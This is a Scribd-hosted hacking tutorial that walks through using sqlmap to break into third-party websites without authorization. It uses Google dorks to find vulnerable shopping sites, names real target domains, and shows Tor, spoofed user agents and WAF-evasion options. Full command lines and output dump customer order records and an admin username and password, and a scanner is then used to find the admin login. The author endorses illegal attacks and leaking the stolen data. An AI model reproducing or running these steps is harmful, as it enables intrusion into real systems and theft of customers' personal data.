Scribd
Upload
106 views

How To Hack Databases

Uploaded by

chaowandao
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
106 views

How To Hack Databases

Uploaded by

chaowandao
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

TUTORIAL : DATABASE HACKING

How To Hack Databases With SQLMap (advanced)

I did already a tutorial about sqlmap but i think we should do this deeper.

Can we use Sqlmap in termux?


- Yes we can!

Installation in Termux:

$ wget https://github.com/sqlmapproject/sqlmap/archive/master.zip
$ pkg install unzip python2
$ unzip master.zip
$ cd sqlmap-master
$ python2 sqlmap.py

What do we need?
We need dorks, what are dorks?
Dorks are specific keywords, to find specific files, targets or websites.
I found some nice dorks, you can use one of them, for example i want shopping sites.

https://pastr.io/view/jpkjfyAIaKy

To get some vulnerable links, you can use sqlmap or you search manually in google, bing or
duckduckgo.

$ sqlmap -g "intext:"Jewellery" inurl:/php?id="

-g is for google dork.


It will give you all results, i will decline all results, until i found an pagetype extension like:

itemspage.aspx?val=2

To test it i will agree with "Y".


May be it will asking you for using PHP cookie, i don't use.

If you are using SQLi Dumper in Windows, you can copy all dorks, the tool will find it will all
available search engines and will save URLs for the injectable part.

My domain will : http://www.melbournefineart.com.au/gallery.php?id=18

The basic syntax for sqlmap is sqlmap -u URL [OPTIONS]


I will explain some important options, and you can decide to use basic, or advanced options

--method=METHOD
There are some methods, to retrieve information about the target. I recognized that if i use GET it's
giving me errors. I tried another methods also, it gaves more methods, i can list it down below:
GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE

GET

The GET method is used to retrieve information from the given server using a given URI. Requests
using GET should only retrieve data and should have no other effect on the data.

HEAD

Same as GET, but transfers the status line and header section only.

POST

A POST request is used to send data to the server, for example, customer information, file upload,
etc. using HTML forms.

PUT

Replaces all current representations of the target resource with the uploaded content.

DELETE

Removes all current representations of the target resource given by a URI.

CONNECT

Establishes a tunnel to the server identified by a given URI.

OPTIONS

Describes the communication options for the target resource.

TRACE

Performs a message loop-back test along the path to the target resource.

Source from Tutorialspoints (not from rebl0x3r)


If you want to look for examples:

https://www.tutorialspoint.com/http/http_methods.htm

One of the first warnings are „[04:13:10] [WARNING] detected empty POST body“
Since this warnings will print out, i know i can use the POST method.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST
[03:50:05] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1
to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
--data=DATA

Data is for example „id=1“, you can use it, but if you insert the link with php?id=345 then it‘s
unecessary.

--mobile

This will spoof a user-agent by choosing a smartphone like:

[1] Apple iPhone 8 (default)


[2] BlackBerry Z10
[3] Google Nexus 7
[4] Google Pixel
[5] HP iPAQ 6365
[6] HTC 10
[7] Huawei P8
[8] Microsoft Lumia 950
[9] Nokia N97
[10] Samsung Galaxy S7
[11] Xiaomi Mi 3

>1

We are saying the browser with this option, that we are using a phone.
Is this options useful? - It‘s because some User-Agent are blocked. User-Agent telling the
browser // website:
- Device Model (Iphone, Android ...)
- Browser (Chrome, Firefox …)
- Browser Version (Mozillla Gecko/20100101 Firefox/67.0)
- Operating System Version (android 8.0...)

A User-Agent looks like this:


Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:67.0) Gecko/20100101 Firefox/67.0

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 –
method=POST --mobile

--random-agent
This selects a random User-Agent, a 2nd version of the –mobile.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent

--ignore-401

It is ignoring the error code of HTTP 401 (Unauthorized), it‘s an optional option. If this gives you
an error, use --ignore-code=401

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401
--tor

Using the tor anonymity network, if you have not VPN. A disadvantage is, most websites detects
the blacklisted IP‘s of TOR network. But‘s it‘s good if you doing illegal attack.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor

--retries=RETRIES

Here you can select the retries, when the connection timeouts. Sqlmap recommend to use value 3.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 –
method=POST --random-agent --ignore-401 --tor --retries=3

--force-ssl

Force usage of SSL/HTTPS of a website, some websites are only HTTP, you can try it with –force-
ssl, if you are not getting a good result on http:// URLs.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl

--keep-alive

This using persistent HTTP(s) connections, which is trying to get no errors while testing, it‘s not
required to use.

--threads=THREADS

Max number of concurrent HTTP(s) requests, sqlmap‘s thread is 1, to speed up you can use 10.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10

--level=LEVEL

Level of tests to perform, 1 is default, maximum is 5.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 –
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5

--risk=RISK

Risk of test to perfom, 1 ist default, maximum is 3.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3

-f | --fingerprint
Perform an extensive Database Management System version fingerprint.
hese options can be used to enumerate the back-end database management system information,
structure and data contained in tables. Moreover you can run your own SQL statements

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f

-a | --all

This retrieves all, i recommend to save output in a text file, because it‘s different from website to
website it will retrieve:
- Databases
- Tables
- Columns

And this are very much, for examples users/emails 20.000, this will flood your terminal.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --all >> file.txt

--hostname

The hostname the name of the domain name server, it‘s print it out.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 –
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --hostname

--users

--passwords

This will enumerate the users and passwords.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --hostname --users --passwords

--dbs

This enumerates the database, you can use it before you enumerate the tables, which is
recommendable. Use --dbs to replace --users and --passwords.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --hostname --dbs
--tables
Enumerates tables, useful to fetch later the columns like users, and so on.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --hostname --tables

--columns

Enumerates table columns, we are adding -T for the table, and --columns for the item inside the
table.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --hostname --columns

--dump

This option is for dump DBMS database table entries.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --
threads=10 --level=5 --risk=3 -f --hostname -D finearts -T users --dump

-D = Database
-T = Tables
-C = Columns
-U = Users

--hex

Uses hex functions for data retrieval

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --
method=POST --random-agent --ignore-401 --hex --tor --retries=3 --force-
ssl --threads=10 --level=5 --risk=3 -f --hostname -D finearts -T users --
dump

--wizard & --parse-errors

Simple wizard interface for beginners, and parsing errors while running.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --wizard


--parse-errors
HOW TO DUMP DATA FROM A DATABASE

Step 1). Finding Vulnerable Website.

$ sqlmap -g cart.php?id=3

Or google for Gaming shopping dorks, you can also create dorks, it gives you a higher chance to
find rares databases, i will make a tutorial about it in a another PDF.

URL found?

Step 2). Testing URL

$ sqlmap -u https://xxxxx.com/xxx.php?id=2

I got the error : 403 Forbidden


And:

[05:43:35] [CRITICAL] all tested parameters do not appear to be


injectable. Try to increase values for '--level'/'--risk' options if you
wish to perform more tests. If you suspect that there is some kind of
protection mechanism involved (e.g. WAF) maybe you could try to use
option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--
random-agent'

Re-run tool to fix the errors.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --


tamper=space2comment

GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y

[05:46:31] [CRITICAL] unable to connect to the target URL. sqlmap is


going to retry the request(s)

Step 3). Get the database

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-


code=403 --level=3 --risk=2 --dbs

If you have any PHP cookie, use it

[05:50:11] [INFO] testing connection to the target URL


you have not declared cookie(s), while server wants to set its own
('PHPSESSID=5mnk9btt6b9...savdfcjbe5'). Do you want to use those [Y/n] y
[05:49:19] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] loops001_loops

After we found 2 Databases, we will checkout their tables, by replacing --dbs with --tables

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-


code=403 --level=3 --risk=2 --tables

[05:50:23] [INFO] fetching tables for databases: 'information_schema,


loops001_loops'
Database: information_schema
[77 tables]
Database: loops001_loops
[10 tables]
+---------------------------------------+
| brands |
| categories |
| description |
| footwear |
| helmets |
| information |
| order_details |
| products |
| subscribers |
| users |

At table looks like this, it will print the columns inside the table, so let‘s fetch it.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-


code=403 --level=3 --risk=2 -D loops001_loops -T order_details --columns
--dump

[05:54:52] [INFO] fetching columns for table 'order_details' in database


'loops001_loops'
Database: loops001_loops
Table: order_details
[8 columns]
+-----------------+----------------+
| Column | Type |
+-----------------+----------------+
| date | date |
| id | int(11) |
| name | varchar(64) |
| country | varchar(64) |
| email | varchar(64) |
| phone | varchar(64) |
| product_details | varchar(10000) |
| status | varchar(11) |
+-----------------+----------------+

[05:54:53] [INFO] fetching columns for table 'order_details' in database


'loops001_loops'
[05:54:53] [INFO] fetching entries for table 'order_details' in database
'loops001_loops'

After this command it floods my terminal, the CSV is saved in ./root/.sqlmap/output/websitename

[05:55:04] [INFO] table 'loops001_loops.order_details' dumped to CSV file


'/root/.sqlmap/output/loopsuae.com/dump/loops001_loops/order_details.csv'
[05:55:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/loopsuae.com'

That‘s not enough let‘s dump the users.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-


code=403 --level=3 --risk=2 -D loops001_loops -T users --columns --dump

[05:57:42] [INFO] fetching columns for table 'users' in database


'loops001_loops'
Database: loops001_loops
Table: users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| password | varchar(128) |
| username | varchar(128) |
+----------+--------------+

[05:57:42] [INFO] fetching columns for table 'users' in database


'loops001_loops'
[05:57:42] [INFO] fetching entries for table 'users' in database
'loops001_loops'
Database: loops001_loops
Table: users
[1 entry]
+------+----------+------------+
| id | username | password |
+------+----------+------------+
| 1 | admin | salam |
+------+----------+------------+

Ok, i think the admin should change the password.


How to get access to admin login?
The tool we use is „uniscan“:

$ git clone https://github.com/poerschke/Uniscan.git


$ cd Uniscan
$ chmod +x install-modules.sh
$ apt install perl cpan
$ ./install-modules.sh
$ perl uniscan.pl -u [URL] -qweds
And you get your admin directory, like
https://target.com/wp-admin/

Step 4.) Open the CSV and enjoy your data. (leaking is also possible)

FIXING ERRORS:
[04:59:31] [CRITICAL] can't establish connection with the Tor SOCKS
proxy. Please make sure that you have Tor service installed and setup so
you could be able to successfully use switch '--tor'

Fix this error, by installing tor :

$ pkg install tor


$ apt install tor
$ service tor start

[05:01:58] [CRITICAL] page not found (404)


it is not recommended to continue in this kind of cases. Do you want to
quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:

[CRITICAL] sqlmap was not able to fingerprint the back-end database


management system

Remove -f option.

[05:03:20] [WARNING] HTTP error codes detected during run:


404 (Not Found) - 5 times, 500 (Internal Server Error) - 17 times, 403
(Forbidden) - 4 times

Remove --force-ssl

[05:05:16] [WARNING] in case of continuous data retrieval problems you


are advised to try a switch '--no-cast' or switch '--hex'

Use --no-cast

[05:06:17] [CRITICAL] considerable lagging has been detected in


connection response(s). Please use as high value for option '--time-sec'
as possible (e.g. 10 or more)

Use --time-sec=20

[05:06:20] [CRITICAL] unable to retrieve the number of database users

Remove –users

[05:10:18] [ERROR] unable to retrieve the number of databases


[05:10:18] [INFO] falling back to current database
[05:10:18] [INFO] fetching current database
available databases [1]:
[*] finearts

No error, they fetched only 1 database, you can try your luck but in most cases at this „ERROR“ it‘s
trash database.

[05:18:59] [WARNING] unexpected HTTP code '500' detected. Will use


(extra) validation step in similar cases

Adding options: --parse-errors and --proxy will help, if not try to fetch banner using: --banner

[05:20:16] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y

Do Y for Yes, then 1 for common list, and 10 for threads. Just wait.

[05:07:02] [WARNING] target URL content is not stable (i.e. content


differs). sqlmap will base the page comparison on a sequence matcher. If
no dynamic nor injectable parameters are detected, or in case of junk
results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

Continue with C

[05:35:32] [WARNING] unable to retrieve column names for table 'client'


in database 'finearts'
do you want to use common column existence check? [y/N/q] y

Same as --tables just type Y for scanning, it will print you call columns.

WRITTEN BY MRBLACK AKA THEMASTERCH

TELEGRAM:

۞▬▬▬▬▬▬▬▬▬▬ ▬▬▬▬▬▬▬▬▬▬ ۞

���� ��� ��������

t.me/rebl0x3r
t.me/deepwaterleaks (currently down)
t.me/deepwaterleaks2

۞▬▬▬▬▬▬▬▬▬▬ ▬▬▬▬▬▬▬▬▬▬ ۞

You might also like